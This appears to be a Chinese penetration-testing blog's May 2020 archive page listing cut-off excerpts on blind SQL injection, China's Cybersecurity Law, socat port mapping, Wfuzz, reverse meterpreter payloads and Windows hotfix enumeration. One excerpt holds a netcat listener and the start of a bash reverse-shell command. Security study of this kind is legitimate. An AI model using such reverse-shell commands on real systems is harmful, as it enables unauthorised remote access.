按时间归档：2020年05月

写在前面： 这篇文章主要写了一些加快盲注速度的技巧和盲注中比较精巧的语句，虽然注入并不是什么新技术了。但是数据库注入漏洞依然 困扰着每一个安全厂商，也鞭策着每一个安全从业者不断前进…

第一章　总　　则 第一条 为了保障网络安全，维护网络空间主权和国家安全、社会公共利益，保护公民、法人和其他组织的合法权益，促进经济社会信息化健康发展，制定本法。 第二条 在中华人民…

端口映射 将WEB服务器的80端口映射到ubuntu上的80端口 ubuntu执行 socat -d -d -d tcp-l:8080,reuseaddr,bind=0.0.0.0…

在linux反弹建立交互的时候会出现乱码 不能补全文件，方向键也会出现乱码。 解决办法 1.建立交互shell kali nc -vlnp 8080 bash -i >&am…

Wfuzz（一款支持各种Web漏洞扫描的工具） Wfuzz是一款Web应用程序暴力破解工具。它可以通过遍历以发现隐藏的资源（例如：目录、脚本和servlets等）。Wfuzz能够穷…

1 应用场景 在多个或者两个不网络中使用正向连接远程的攻击载荷，但是有时会有限制，如防火墙同事也会暴露我们在网络中的位置。让攻击载荷反向连接 meterpreter 同时也能隐藏攻…

1.以管理员的身份运行cmd，输入命令：wmic qfe get hotfixid >> c:\list.txt 2.打开C盘下的list.txt 将第一行的内容删除后…